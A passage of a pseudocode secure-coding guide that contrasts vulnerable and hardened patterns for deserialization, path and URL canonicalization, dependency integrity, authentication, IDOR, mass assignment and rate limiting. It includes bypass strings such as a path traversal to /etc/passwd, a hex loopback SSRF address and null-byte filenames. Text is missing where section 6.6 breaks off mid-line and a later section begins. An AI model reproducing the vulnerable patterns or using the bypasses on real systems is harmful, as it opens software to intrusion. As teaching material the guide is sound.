parsed_url.host NOT IN ALLOWED_HOSTS: + THROW ValidationError("URL host not allowed") + END IF + + // Fetch with timeout and size limits + response = http.get(url, timeout=10, max_size=1024*1024) + + // Parse and validate structure + TRY: + data = json.parse(response.body) + CATCH JSONError: + THROW ValidationError("Invalid JSON response") + END TRY + + // Validate against expected schema + validated_data = validate_schema(data, EXPECTED_SCHEMA) + + // Sanitize before storing + sanitized = sanitize_object(validated_data) + database.insert("external_data", sanitized) +END FUNCTION + +FUNCTION deserialize_safe(data, format): + // Never use pickle/eval for untrusted data + 
// Use safe serialization formats + IF format == "json": + RETURN json.parse(data) + ELSE IF format == "msgpack": + RETURN msgpack.unpack(data) + ELSE: + THROW Error("Unsupported format") + END IF +END FUNCTION + +FUNCTION process_xml_safe(xml_string): + // Disable external entities and DTDs + parser = xml.create_parser( + resolve_entities=FALSE, + load_dtd=FALSE, + no_network=TRUE + ) + + TRY: + doc = parser.parse(xml_string) + RETURN doc + CATCH XMLError as e: + log.warning("XML parsing failed", {error: e.message}) + THROW ValidationError("Invalid XML") + END TRY +END FUNCTION + +// Schema validation helper +FUNCTION validate_schema(data, schema): + // Use JSON Schema or similar validation library + validator = JsonSchemaValidator(schema) + + IF NOT validator.is_valid(data): + errors = validator.get_errors() + THROW ValidationError("Schema validation failed: " + errors.join(", ")) + END IF + + RETURN data +END FUNCTION +``` + +### 6.6 Missing Canonicalization + +``` +// PSEUDOCODE - Implement in your target language + +// ======================================== +// BAD: Validation without canonicalization +// ======================================== +FUNCTION check_path_unsafe(requested_path): + // Vulnerable: Path not canonicalized before validation + IF requested_path.starts_with("/uploads/"): + // Bypass: "/uploads/../../etc/passwd" passes the prefix check + // But resolves to outside the directory! 
+ RETURN read_file(requested_path) + END IF + THROW AccessDenied("Invalid path") +END FUNCTION + +FUNCTION check_url_unsafe(url): + // Vulnerable: URL manipulation bypasses check + // Blocked: "http://internal-server" + // Bypass: "http://internal-server%00.example.com" + // Bypass: "http://0x7f000001" (127.0.0.1 in hex) + // Bypass: "http://localhost" vs "http://LOCALHOST" vs "http://127.0.0.1" + + IF url.contains("internal-server"): + THROW AccessDenied("Internal URLs not allowed") + END IF + + RETURN http.get(url) +END FUNCTION + +FUNCTION validate_filename_unsafe(filename): + // Vulnerable: Unicode normalization bypass + // Blocked: "config.php" + // Bypass: "config.php" with full-width characters (config.php) + // Bypass: "config.php\x00.txt" (null byte injection) + + IF filename.ends_with(".php"): + THROW AccessDenied("PHP files not allowed") + END IF + + save_file(filename) +END FUNCTION + +FUNCTION check_html_unsafe(content): + // Vulnerable: Case-sensitive blacklist + // Blocked: " + +// Downloading without verification +FUNCTION download_dependency(url): + content = http.get(url) + write_file("lib/dependency.js", content) + // No verification that content is what we expected +END FUNCTION + +// Package install without lockfile integrity +FUNCTION install(): + run_command("npm install") // Uses ^ ranges, no integrity check +END FUNCTION + +// Build process pulling from remote without checks +FUNCTION build(): + // Downloading build tools without verification + download("https://build-tools.example.com/compiler.tar.gz") + extract("compiler.tar.gz") + execute("./compiler/build") // Running unverified code +END FUNCTION + +// ======================================== +// GOOD: Verify integrity at every step +// ======================================== + +// HTML with Subresource Integrity (SRI) + + +// Download with hash verification +FUNCTION download_verified(url, expected_hash): + content = http.get(url) + + // Calculate hash of downloaded content + 
actual_hash = crypto.sha384(content) + + IF actual_hash != expected_hash: + log.error("Integrity check failed", { + url: url, + expected: expected_hash, + actual: actual_hash + }) + THROW SecurityError("Downloaded file failed integrity check") + END IF + + RETURN content +END FUNCTION + +FUNCTION download_dependency(url, expected_hash): + content = download_verified(url, expected_hash) + write_file("lib/dependency.js", content) + log.info("Dependency installed with verified integrity", {url: url}) +END FUNCTION + +// Package lockfile with integrity hashes +// package-lock.json includes: +{ + "lodash": { + "version": "4.17.21", + "resolved": "https://registry.npmjs.org/lodash/-/lodash-4.17.21.tgz", + "integrity": "sha512-v2kDE0cyTsc..." // Verified on install + } +} + +// Strict install from lockfile +FUNCTION install_with_integrity(): + // npm ci verifies integrity hashes from lockfile + result = run_command("npm ci") + + IF NOT result.success: + THROW Error("Installation failed integrity verification") + END IF +END FUNCTION + +// Build reproducibility with verified tools +FUNCTION secure_build(): + // Pin and verify all build tool versions + tools = { + "node": {version: "20.10.0", hash: "sha256:abc123..."}, + "npm": {version: "10.2.3", hash: "sha256:def456..."}, + "compiler": {version: "1.2.3", hash: "sha256:ghi789..."} + } + + FOR tool_name, tool_spec IN tools: + // Verify tool binary integrity before use + actual_hash = hash_file(get_tool_path(tool_name)) + + IF actual_hash != tool_spec.hash: + THROW SecurityError("Build tool integrity check failed: " + tool_name) + END IF + END FOR + + // Proceed with verified tools + run_build() +END FUNCTION + +// Generate SRI hashes for your own assets +FUNCTION generate_sri_hash(file_path): + content = read_file(file_path) + hash = crypto.sha384_base64(content) + RETURN "sha384-" + hash +END FUNCTION + +FUNCTION generate_script_tag(src, file_path): + integrity = generate_sri_hash(file_path) + // crossorigin is needed for SRI checks on cross-origin scripts + RETURN '<script src="' + src + '" integrity="' + integrity + '" crossorigin="anonymous"></script>' +END FUNCTION + +// 
Registry verification +FUNCTION verify_registry(): + // Ensure using official, signed registry + registry_config = get_registry_config() + + IF NOT registry_config.url.startswith("https://"): + THROW SecurityError("Registry must use HTTPS") + END IF + + // Verify registry certificate + IF NOT verify_certificate(registry_config.url): + THROW SecurityError("Registry certificate verification failed") + END IF + + // Check for registry signing if supported + IF registry_supports_signing(registry_config.url): + enable_signature_verification() + END IF +END FUNCTION +``` + +### 8.6 Trusting Transitive Dependencies Blindly + +``` +// PSEUDOCODE - Implement in your target language + +// ======================================== +// BAD: Ignoring transitive dependency risks +// ======================================== + +// Your package.json has 10 direct dependencies +// But those bring in 500+ transitive dependencies +// Each is a potential attack vector + +FUNCTION show_dependency_problem(): + // You audit only direct dependencies + direct_deps = ["express", "lodash", "axios"] // 3 packages + + // Reality after npm install + all_deps = get_all_installed_packages() + print("Direct: 3, Total installed: " + all_deps.count) // 547 packages! 
+ + // Any of those 544 transitive deps could be: + // - Abandoned and vulnerable + // - Taken over by malicious actors + // - Typosquats + // - Compromised in CI/CD +END FUNCTION + +// Event-stream incident: Dependency of dependency was compromised +// ua-parser-js incident: Popular package itself was compromised +// node-ipc incident: Maintainer added malicious code + +// ======================================== +// GOOD: Full dependency tree visibility and control +// ======================================== + +// Step 1: Analyze full dependency tree +FUNCTION analyze_dependency_tree(): + tree = package_manager.get_dependency_tree() + + analysis = { + direct: [], + transitive: [], + depth_stats: {}, + risk_assessment: [] + } + + FOR dep IN tree.flatten(): + IF dep.depth == 1: + analysis.direct.append(dep) + ELSE: + analysis.transitive.append(dep) + END IF + + // Track dependency depth + analysis.depth_stats[dep.depth] = + (analysis.depth_stats[dep.depth] OR 0) + 1 + + // Risk factors for transitive deps + risk_score = calculate_risk(dep) + IF risk_score > THRESHOLD: + analysis.risk_assessment.append({ + package: dep.name, + introduced_by: dep.parent_chain, + risk_score: risk_score, + factors: get_risk_factors(dep) + }) + END IF + END FOR + + RETURN analysis +END FUNCTION + +FUNCTION calculate_risk(dep): + risk = 0 + + // Maintainer factors + IF dep.maintainers.count == 1: + risk += 10 // Single maintainer - bus factor + END IF + + IF dep.last_update > 2_YEARS_AGO: + risk += 20 // Abandoned package + END IF + + // Security factors + IF dep.vulnerability_count > 0: + risk += dep.vulnerability_count * 15 + END IF + + IF dep.has_install_scripts: + risk += 25 // Runs code on install + END IF + + // Popularity/trust factors + IF dep.weekly_downloads < 1000: + risk += 10 // Low usage + END IF + + IF NOT dep.has_types AND dep.is_js: + risk += 5 // Less maintained indicator + END IF + + RETURN risk +END FUNCTION + +// Step 2: Detect and alert on risky transitive deps 
+FUNCTION monitor_transitive_deps(): + tree = get_dependency_tree() + + FOR dep IN tree.flatten(): + // Check for suspicious characteristics + IF dep.has_install_scripts: + log.warn("Package has install scripts", { + package: dep.name, + path: dep.parent_chain + }) + // Review install scripts for malicious code + scripts = get_install_scripts(dep) + FOR script IN scripts: + IF contains_suspicious_patterns(script): + THROW SecurityError("Suspicious install script in: " + dep.name) + END IF + END FOR + END IF + + // Check for native code compilation + IF dep.has_native_code: + log.warn("Package compiles native code", { + package: dep.name + }) + END IF + + // Check for network access + IF dep.makes_network_requests: + log.warn("Package makes network requests", { + package: dep.name + }) + END IF + END FOR +END FUNCTION + +// Step 3: Use dependency scanning that covers transitives +FUNCTION full_dependency_scan(): + // Scan all dependencies, not just direct + scan_result = security_scanner.scan({ + include_transitive: TRUE, + include_dev_dependencies: TRUE, + scan_depth: "all" // Not just top-level + }) + + FOR vuln IN scan_result.vulnerabilities: + // Show the path that introduces the vulnerability + log.error("Vulnerability found", { + package: vuln.package, + version: vuln.version, + severity: vuln.severity, + introduced_through: vuln.dependency_path, // e.g., "express > body-parser > qs" + recommendation: vuln.recommendation + }) + END FOR + + RETURN scan_result +END FUNCTION + +// Step 4: Consider dependency vendoring for critical deps +FUNCTION vendor_critical_dependency(package_name): + // Download specific version + content = download_verified( + get_package_url(package_name), + get_expected_hash(package_name) + ) + + // Store in vendor directory (committed to repo) + write_file("vendor/" + package_name, content) + + // Point imports to vendored version + configure_import_alias(package_name, "./vendor/" + package_name) + + // Vendored code is: + // - Not 
automatically updated (reduces surprise changes) + // - Under your source control (auditable) + // - Not subject to registry compromise +END FUNCTION + +// Step 5: Use SBOM (Software Bill of Materials) +FUNCTION generate_sbom(): + sbom = { + format: "CycloneDX", // or SPDX + components: [], + dependencies: [] + } + + FOR dep IN get_all_dependencies(): + sbom.components.append({ + type: "library", + name: dep.name, + version: dep.version, + purl: "pkg:npm/" + dep.name + "@" + dep.version, + hashes: [ + {algorithm: "SHA-256", content: dep.sha256} + ], + licenses: dep.licenses, + supplier: dep.publisher + }) + END FOR + + // Export for vulnerability tracking + write_file("sbom.json", json.encode(sbom)) + + // Submit to vulnerability database for ongoing monitoring + vuln_service.monitor_sbom(sbom) +END FUNCTION +``` + +--- + +## 9. API Security + +**CWE References:** CWE-284 (Improper Access Control), CWE-639 (IDOR), CWE-915 (Mass Assignment), CWE-200 (Exposure of Sensitive Information), CWE-770 (Resource Allocation Without Limits), CWE-209 (Error Message Information Exposure) +**Severity:** Critical to High | **Related:** [[API-Security]] + +> **Risk:** APIs are the primary attack surface for modern applications. Missing authentication, broken authorization (IDOR), and mass assignment vulnerabilities allow attackers to access or modify data belonging to other users, escalate privileges, and exfiltrate sensitive information. AI frequently generates API endpoints without proper security controls. 
+ +### 9.1 Missing Authentication on Endpoints + +``` +// PSEUDOCODE - Implement in your target language + +// ======================================== +// BAD: Unprotected API endpoints +// ======================================== + +// No authentication - anyone can access +@route("/api/users") +FUNCTION get_all_users(): + RETURN database.query("SELECT * FROM users") +END FUNCTION + +// Admin functionality without auth check +@route("/api/admin/delete-user/{id}") +FUNCTION admin_delete_user(id): + database.execute("DELETE FROM users WHERE id = ?", [id]) + RETURN {status: "deleted"} +END FUNCTION + +// Sensitive data exposed without auth +@route("/api/orders/{order_id}") +FUNCTION get_order(order_id): + RETURN database.get_order(order_id) +END FUNCTION + +// "Security through obscurity" - hidden endpoint still accessible +@route("/api/internal/debug-info") +FUNCTION get_debug_info(): + RETURN { + database_connection: DB_STRING, + api_keys: LOADED_KEYS, + server_config: CONFIG + } +END FUNCTION + +// ======================================== +// GOOD: Authentication on all protected endpoints +// ======================================== + +// Middleware to enforce authentication +FUNCTION require_auth(handler): + RETURN FUNCTION wrapped(request): + token = request.headers.get("Authorization") + + IF token IS NULL: + RETURN response(401, {error: "Authentication required"}) + END IF + + user = verify_token(token) + IF user IS NULL: + RETURN response(401, {error: "Invalid or expired token"}) + END IF + + request.user = user + RETURN handler(request) + END FUNCTION +END FUNCTION + +// Middleware for admin-only routes +FUNCTION require_admin(handler): + RETURN require_auth(FUNCTION wrapped(request): + IF request.user.role != "admin": + log.security("Unauthorized admin access attempt", { + user_id: request.user.id, + endpoint: request.path + }) + RETURN response(403, {error: "Admin access required"}) + END IF + + RETURN handler(request) + END FUNCTION) +END FUNCTION + +// 
Protected endpoints with proper auth +@route("/api/users") +@require_admin // Only admins can list all users +FUNCTION get_all_users(request): + // Return only non-sensitive fields + users = database.query("SELECT id, name, email, created_at FROM users") + RETURN response(200, {users: users}) +END FUNCTION + +// Admin endpoint with proper protection +@route("/api/admin/delete-user/{id}") +@require_admin +FUNCTION admin_delete_user(request, id): + // Audit log before action + log.audit("User deletion", { + admin_id: request.user.id, + target_user_id: id + }) + + database.soft_delete("users", id) // Soft delete for audit trail + RETURN response(200, {status: "deleted"}) +END FUNCTION + +// Never expose internal/debug endpoints in production +IF environment != "production": + @route("/api/internal/debug-info") + @require_admin + FUNCTION get_debug_info(request): + RETURN {config: get_safe_config()} // Sanitized config only + END FUNCTION +END IF + +// Default deny - explicitly define allowed public endpoints +PUBLIC_ENDPOINTS = [ + "/api/auth/login", + "/api/auth/register", + "/api/public/status", + "/api/public/docs" +] + +FUNCTION global_auth_middleware(request): + IF request.path IN PUBLIC_ENDPOINTS: + RETURN next(request) + END IF + + // All other routes require authentication by default + RETURN require_auth(next)(request) +END FUNCTION +``` + +### 9.2 Broken Object-Level Authorization (IDOR) + +``` +// PSEUDOCODE - Implement in your target language + +// ======================================== +// BAD: IDOR vulnerabilities - no ownership check +// ======================================== + +// Attacker changes user_id in URL to access others' data +@route("/api/users/{user_id}/profile") +@require_auth +FUNCTION get_user_profile(request, user_id): + // VULNERABLE: No check that user_id belongs to authenticated user + profile = database.get_profile(user_id) + RETURN response(200, profile) +END FUNCTION + +// Attacker can delete any order by changing order_id 
+@route("/api/orders/{order_id}") +@require_auth +FUNCTION delete_order(request, order_id): + // VULNERABLE: Deletes any order regardless of owner + database.delete("orders", order_id) + RETURN response(200, {status: "deleted"}) +END FUNCTION + +// Attacker accesses any document by guessing/incrementing ID +@route("/api/documents/{doc_id}") +@require_auth +FUNCTION get_document(request, doc_id): + // VULNERABLE: Sequential IDs make enumeration easy + doc = database.get_document(doc_id) + RETURN response(200, doc) +END FUNCTION + +// Horizontal privilege escalation via parameter tampering +@route("/api/transfer") +@require_auth +FUNCTION transfer_funds(request): + // VULNERABLE: from_account comes from user input + from_account = request.body.from_account + to_account = request.body.to_account + amount = request.body.amount + + execute_transfer(from_account, to_account, amount) + RETURN response(200, {status: "transferred"}) +END FUNCTION + +// ======================================== +// GOOD: Proper object-level authorization +// ======================================== + +// Always verify ownership before access +@route("/api/users/{user_id}/profile") +@require_auth +FUNCTION get_user_profile(request, user_id): + // SECURE: Verify user can only access their own profile + IF user_id != request.user.id AND request.user.role != "admin": + log.security("IDOR attempt blocked", { + authenticated_user: request.user.id, + attempted_access: user_id + }) + RETURN response(403, {error: "Access denied"}) + END IF + + profile = database.get_profile(user_id) + IF profile IS NULL: + RETURN response(404, {error: "Profile not found"}) + END IF + + RETURN response(200, profile) +END FUNCTION + +// Resource ownership verification +@route("/api/orders/{order_id}") +@require_auth +FUNCTION delete_order(request, order_id): + order = database.get_order(order_id) + + IF order IS NULL: + RETURN response(404, {error: "Order not found"}) + END IF + + // SECURE: Verify ownership before 
action + IF order.user_id != request.user.id: + log.security("Unauthorized order deletion attempt", { + user_id: request.user.id, + order_id: order_id, + owner_id: order.user_id + }) + RETURN response(403, {error: "Access denied"}) + END IF + + // Additional business logic check + IF order.status == "shipped": + RETURN response(400, {error: "Cannot delete shipped orders"}) + END IF + + database.delete("orders", order_id) + RETURN response(200, {status: "deleted"}) +END FUNCTION + +// Use UUIDs instead of sequential IDs to prevent enumeration +FUNCTION create_document(request): + doc_id = generate_uuid() // Not sequential, not guessable + + database.insert("documents", { + id: doc_id, + owner_id: request.user.id, + content: request.body.content + }) + + RETURN response(201, {id: doc_id}) +END FUNCTION + +// Implicit ownership from authenticated user +@route("/api/transfer") +@require_auth +FUNCTION transfer_funds(request): + // SECURE: from_account MUST belong to authenticated user + from_account = database.get_account(request.body.from_account) + + IF from_account IS NULL OR from_account.owner_id != request.user.id: + RETURN response(403, {error: "Invalid source account"}) + END IF + + to_account = database.get_account(request.body.to_account) + IF to_account IS NULL: + RETURN response(404, {error: "Destination account not found"}) + END IF + + amount = request.body.amount + IF amount <= 0 OR amount > from_account.balance: + RETURN response(400, {error: "Invalid amount"}) + END IF + + execute_transfer(from_account.id, to_account.id, amount) + + log.audit("Funds transfer", { + user_id: request.user.id, + from: from_account.id, + to: to_account.id, + amount: amount + }) + + RETURN response(200, {status: "transferred"}) +END FUNCTION + +// Reusable authorization decorator +FUNCTION authorize_resource(resource_type, id_param): + RETURN FUNCTION decorator(handler): + RETURN FUNCTION wrapped(request): + resource_id = request.params[id_param] + resource = 
database.get(resource_type, resource_id) + + IF resource IS NULL: + RETURN response(404, {error: resource_type + " not found"}) + END IF + + IF NOT can_access(request.user, resource): + log.security("Authorization failed", { + user_id: request.user.id, + resource_type: resource_type, + resource_id: resource_id + }) + RETURN response(403, {error: "Access denied"}) + END IF + + request.resource = resource + RETURN handler(request) + END FUNCTION + END FUNCTION +END FUNCTION + +// Usage +@route("/api/documents/{doc_id}") +@require_auth +@authorize_resource("documents", "doc_id") +FUNCTION get_document(request, doc_id): + RETURN response(200, request.resource) // Already verified +END FUNCTION +``` + +### 9.3 Mass Assignment Vulnerabilities + +``` +// PSEUDOCODE - Implement in your target language + +// ======================================== +// BAD: Mass assignment - accepting all user input +// ======================================== + +// Attacker sends: {"name": "John", "role": "admin", "balance": 999999} +@route("/api/users/update") +@require_auth +FUNCTION update_user(request): + // VULNERABLE: Directly assigns all request body fields + user = database.get_user(request.user.id) + + FOR field, value IN request.body: + user[field] = value // Attacker can set ANY field! + END FOR + + database.save(user) + RETURN response(200, user) +END FUNCTION + +// ORM auto-mapping vulnerability +@route("/api/users") +@require_auth +FUNCTION create_user(request): + // VULNERABLE: ORM creates user from all request fields + user = User.create(request.body) // Includes role, isAdmin, etc.! 
+ RETURN response(201, user) +END FUNCTION + +// Nested object mass assignment +@route("/api/orders") +@require_auth +FUNCTION create_order(request): + // VULNERABLE: Nested payment object can set price + order = Order.create({ + user_id: request.user.id, + items: request.body.items, + payment: request.body.payment // Attacker sets payment.amount = 0 + }) + RETURN response(201, order) +END FUNCTION + +// ======================================== +// GOOD: Explicit field allowlisting +// ======================================== + +// Define what fields can be updated +CONSTANT USER_UPDATABLE_FIELDS = ["name", "email", "phone", "address"] +CONSTANT USER_ADMIN_FIELDS = ["role", "status", "verified"] + +@route("/api/users/update") +@require_auth +FUNCTION update_user_secure(request): + user = database.get_user(request.user.id) + + // SECURE: Only update explicitly allowed fields + FOR field IN USER_UPDATABLE_FIELDS: + IF field IN request.body: + user[field] = sanitize(request.body[field]) + END IF + END FOR + + database.save(user) + + // Return only safe fields + RETURN response(200, user.to_public_dict()) +END FUNCTION + +// Admin with different field permissions +@route("/api/admin/users/{user_id}") +@require_admin +FUNCTION admin_update_user(request, user_id): + user = database.get_user(user_id) + + // Admins can update more fields, but still allowlisted + allowed_fields = USER_UPDATABLE_FIELDS + USER_ADMIN_FIELDS + + FOR field IN allowed_fields: + IF field IN request.body: + user[field] = request.body[field] + END IF + END FOR + + log.audit("Admin user update", { + admin_id: request.user.id, + user_id: user_id, + fields_changed: request.body.keys() + }) + + database.save(user) + RETURN response(200, user) +END FUNCTION + +// Use DTOs (Data Transfer Objects) for input +CLASS UserUpdateDTO: + name: String (max_length=100) + email: String (email_format, max_length=255) + phone: String (phone_format, optional) + address: String (max_length=500, optional) + + FUNCTION 
from_request(body): + dto = UserUpdateDTO() + dto.name = validate_string(body.name, max_length=100) + dto.email = validate_email(body.email) + dto.phone = validate_phone(body.phone) IF body.phone ELSE NULL + dto.address = validate_string(body.address, max_length=500) IF body.address ELSE NULL + RETURN dto + END FUNCTION +END CLASS + +@route("/api/users/update") +@require_auth +FUNCTION update_user_dto(request): + TRY: + dto = UserUpdateDTO.from_request(request.body) + CATCH ValidationError as e: + RETURN response(400, {error: e.message}) + END TRY + + user = database.get_user(request.user.id) + user.apply_dto(dto) // Only applies DTO fields + database.save(user) + + RETURN response(200, user.to_public_dict()) +END FUNCTION + +// Nested objects with strict validation +CLASS OrderCreateDTO: + items: Array of OrderItemDTO + shipping_address_id: UUID + // payment calculated server-side, NOT from request + + FUNCTION from_request(body, user): + dto = OrderCreateDTO() + dto.items = [OrderItemDTO.from_request(item) FOR item IN body.items] + + // Verify address belongs to user + address = database.get_address(body.shipping_address_id) + IF address IS NULL OR address.user_id != user.id: + THROW ValidationError("Invalid shipping address") + END IF + dto.shipping_address_id = address.id + + RETURN dto + END FUNCTION +END CLASS + +@route("/api/orders") +@require_auth +FUNCTION create_order_secure(request): + dto = OrderCreateDTO.from_request(request.body, request.user) + + // Calculate payment server-side from validated items + total = 0 + FOR item IN dto.items: + product = database.get_product(item.product_id) + total += product.price * item.quantity // Price from DB, not request! 
+ END FOR + + order = Order.create({ + user_id: request.user.id, + items: dto.items, + shipping_address_id: dto.shipping_address_id, + total: total // Server-calculated + }) + + RETURN response(201, order.to_dict()) +END FUNCTION +``` + +### 9.4 Excessive Data Exposure + +``` +// PSEUDOCODE - Implement in your target language + +// ======================================== +// BAD: Exposing too much data in API responses +// ======================================== + +// Returns entire user object including sensitive fields +@route("/api/users/{user_id}") +@require_auth +FUNCTION get_user(request, user_id): + user = database.get_user(user_id) + RETURN response(200, user) // Includes password_hash, SSN, internal_notes! +END FUNCTION + +// Returns all columns from database +@route("/api/orders") +@require_auth +FUNCTION get_orders(request): + orders = database.query("SELECT * FROM orders WHERE user_id = ?", + [request.user.id]) + RETURN response(200, orders) // Includes internal pricing, profit margins +END FUNCTION + +// Exposes related entities without filtering +@route("/api/products/{id}") +FUNCTION get_product(request, id): + product = database.get_product_with_relations(id) + RETURN response(200, product) // Includes supplier.contact, supplier.cost +END FUNCTION + +// Debug info in production responses +@route("/api/search") +FUNCTION search(request): + results = database.search(request.query.q) + RETURN response(200, { + results: results, + query_time_ms: results.execution_time, + sql_query: results.raw_query, // Exposes DB schema! 
+ server_id: SERVER_ID + }) +END FUNCTION + +// ======================================== +// GOOD: Response filtering and DTOs +// ======================================== + +// Define response schemas +CLASS UserPublicResponse: + id: UUID + name: String + avatar_url: String + created_at: DateTime + + FUNCTION from_user(user): + RETURN { + id: user.id, + name: user.name, + avatar_url: user.avatar_url, + created_at: user.created_at + } + END FUNCTION +END CLASS + +CLASS UserPrivateResponse: // For the user themselves + id: UUID + name: String + email: String + phone: String (masked) + avatar_url: String + created_at: DateTime + preferences: Object + + FUNCTION from_user(user): + RETURN { + id: user.id, + name: user.name, + email: user.email, + phone: mask_phone(user.phone), // Show only last 4 digits + avatar_url: user.avatar_url, + created_at: user.created_at, + preferences: user.preferences + } + END FUNCTION +END CLASS + +@route("/api/users/{user_id}") +@require_auth +FUNCTION get_user_filtered(request, user_id): + user = database.get_user(user_id) + + IF user IS NULL: + RETURN response(404, {error: "User not found"}) + END IF + + // Different responses based on who's requesting + IF user_id == request.user.id: + RETURN response(200, UserPrivateResponse.from_user(user)) + ELSE: + RETURN response(200, UserPublicResponse.from_user(user)) + END IF +END FUNCTION + +// Explicit field selection in queries +@route("/api/orders") +@require_auth +FUNCTION get_orders_filtered(request): + // Only select fields needed for the response + orders = database.query( + "SELECT id, status, total, created_at, shipping_address " + + "FROM orders WHERE user_id = ?", + [request.user.id] + ) + + RETURN response(200, { + orders: orders.map(order => OrderResponse.from_order(order)) + }) +END FUNCTION + +// Filter nested relations +CLASS ProductResponse: + id: UUID + name: String + description: String + price: Decimal + category: String + images: Array + average_rating: Float + // 
Excludes: cost, supplier, profit_margin, internal_notes + + FUNCTION from_product(product): + RETURN { + id: product.id, + name: product.name, + description: product.description, + price: product.price, + category: product.category.name, // Only category name + images: product.images.map(i => i.url), // Only URLs + average_rating: product.average_rating + } + END FUNCTION +END CLASS + +// GraphQL field filtering +FUNCTION resolve_user(parent, args, context): + user = database.get_user(args.id) + + // Check each requested field + allowed_fields = get_allowed_fields(context.user, user) + + result = {} + FOR field IN context.requested_fields: + IF field IN allowed_fields: + result[field] = user[field] + ELSE: + result[field] = NULL // Or omit entirely + END IF + END FOR + + RETURN result +END FUNCTION + +// Never expose internal debugging info +@route("/api/search") +FUNCTION search_safe(request): + results = database.search(request.query.q) + + RETURN response(200, { + results: results.items.map(item => item.to_public_dict()), + total: results.total_count, + page: results.page + // No query_time_ms, sql_query, or server_id + }) +END FUNCTION + +// Pagination to prevent data dumping +@route("/api/users") +@require_admin +FUNCTION list_users(request): + page = INT(request.query.page, default=1) + per_page = MIN(INT(request.query.per_page, default=20), 100) // Max 100 + + users = database.paginate("users", page, per_page) + + RETURN response(200, { + users: users.map(u => UserAdminResponse.from_user(u)), + pagination: { + page: page, + per_page: per_page, + total_pages: users.total_pages, + total_count: users.total_count + } + }) +END FUNCTION +``` + +### 9.5 Missing Rate Limiting + +``` +// PSEUDOCODE - Implement in your target language + +// ======================================== +// BAD: No rate limiting +// ======================================== + +// Login endpoint vulnerable to brute force +@route("/api/auth/login") +FUNCTION login(request): + user = 
database.find_by_email(request.body.email) + + IF user IS NULL OR NOT verify_password(request.body.password, user.password_hash): + RETURN response(401, {error: "Invalid credentials"}) + END IF + + RETURN response(200, {token: create_token(user)}) +END FUNCTION + +// Expensive operation with no limits +@route("/api/reports/generate") +@require_auth +FUNCTION generate_report(request): + // CPU-intensive, no limits - easy DoS + report = generate_complex_report(request.body.params) + RETURN response(200, report) +END FUNCTION + +// SMS/email sending without limits +@route("/api/auth/send-verification") +FUNCTION send_verification(request): + // Attacker can spam any phone/email + send_sms(request.body.phone, generate_code()) + RETURN response(200, {status: "sent"}) +END FUNCTION + +// ======================================== +// GOOD: Comprehensive rate limiting +// ======================================== + +// Rate limiter configuration (window is in seconds, as redis.expire expects) +rate_limits = { + // Per IP limits + "ip:global": {limit: 1000, window: 3600}, // 1 hour + "ip:auth": {limit: 10, window: 900}, // 15 minutes + "ip:sensitive": {limit: 5, window: 60}, // 1 minute + + // Per user limits + "user:global": {limit: 5000, window: 3600}, // 1 hour + "user:write": {limit: 100, window: 3600}, // 1 hour + + // Per resource limits + "resource:reports": {limit: 10, window: 3600} // 1 hour +} + +FUNCTION rate_limit(key_type, key_suffix=""): + RETURN FUNCTION decorator(handler): + RETURN FUNCTION wrapped(request): + config = rate_limits[key_type] + + // Build rate limit key + IF key_type.starts_with("ip:"): + key = key_type + ":" + request.client_ip + key_suffix + ELSE IF key_type.starts_with("user:"): + IF request.user IS NULL: + RETURN response(401, {error: "Authentication required"}) + END IF + key = key_type + ":" + request.user.id + key_suffix + ELSE: + key = key_type + key_suffix + END IF + + // Check rate limit (fixed window: the first hit starts the window) + current = redis.incr(key) + IF current == 1: + redis.expire(key, config.window) + END IF + + IF current > config.limit: + 
retry_after = redis.ttl(key) + log.security("Rate limit exceeded", { + key: key, + ip: request.client_ip, + user_id: request.user.id IF request.user ELSE NULL + }) + RETURN response(429, { + error: "Too many requests", + retry_after: retry_after + }, headers={"Retry-After": retry_after}) + END IF + + // Run the handler, then add rate limit headers + // (named "result" so it does not shadow the response() helper) + result = handler(request) + result.headers["X-RateLimit-Limit"] = config.limit + result.headers["X-RateLimit-Remaining"] = config.limit - current + result.headers["X-RateLimit-Reset"] = redis.ttl(key) + + RETURN result + END FUNCTION + END FUNCTION +END FUNCTION + +// Login with rate limiting +@route("/api/auth/login") +@rate_limit("ip:auth") +FUNCTION login_protected(request): + email = request.body.email + + // Additional per-account rate limiting + account_key = "auth:account:" + sha256(email) + attempts = redis.incr(account_key) + IF attempts == 1: + redis.expire(account_key, 3600) // 1 hour + END IF + + IF attempts > 5: + // Lock account temporarily + log.security("Account locked due to failed attempts", { + email_hash: sha256(email) // Don't log raw email + }) + RETURN response(423, { + error: "Account temporarily locked", + retry_after: redis.ttl(account_key) + }) + END IF + + user = database.find_by_email(email) + + IF user IS NULL OR NOT verify_password(request.body.password, user.password_hash): + // Don't reset counter on failure + RETURN response(401, {error: "Invalid credentials"}) + END IF + + // Reset counter on successful login + redis.delete(account_key) + + RETURN response(200, {token: create_token(user)}) +END FUNCTION + +// Expensive operations with strict limits +@route("/api/reports/generate") +@require_auth +@rate_limit("user:write") +@rate_limit("resource:reports") +FUNCTION generate_report_limited(request): + // Cap concurrent reports per user; accepted requests are queued for async processing + active_reports = get_active_report_count(request.user.id) + + IF active_reports > 3: + RETURN response(429, {error: "Too many reports in progress"}) + END IF + + job_id = 
queue_report_generation(request.user.id, request.body.params) + + RETURN response(202, { + job_id: job_id, + status: "queued", + estimated_time: estimate_completion_time() + }) +END FUNCTION + +// SMS/email with phone/email-specific limits +@route("/api/auth/send-verification") +@rate_limit("ip:sensitive") +FUNCTION send_verification_limited(request): + phone = request.body.phone + + // Rate limit per phone number + phone_key = "verify:phone:" + sha256(phone) + count = redis.incr(phone_key) + IF count == 1: + redis.expire(phone_key, 3600) // 1 hour + END IF + + IF count > 3: + RETURN response(429, { + error: "Too many verification requests for this number" + }) + END IF + + // Verify phone format before sending + IF NOT is_valid_phone(phone): + RETURN response(400, {error: "Invalid phone number"}) + END IF + + code = generate_secure_code() + redis.setex("verify:code:" + sha256(phone), 600, code) // 10 min expiry + + send_sms(phone, "Your code: " + code) + + RETURN response(200, {status: "sent"}) +END FUNCTION + +// Sliding window rate limiter for more precise control +FUNCTION sliding_window_limit(key, limit, window_seconds): + now = current_timestamp() + window_start = now - window_seconds + + // Remove old entries + redis.zremrangebyscore(key, "-inf", window_start) + + // Count current window + count = redis.zcard(key) + + IF count >= limit: + RETURN FALSE + END IF + + // Add current request + redis.zadd(key, now, generate_uuid()) + redis.expire(key, window_seconds) + + RETURN TRUE +END FUNCTION +``` + +### 9.6 Improper Error Handling in APIs + +``` +// PSEUDOCODE - Implement in your target language + +// ======================================== +// BAD: Error messages revealing internal details +// 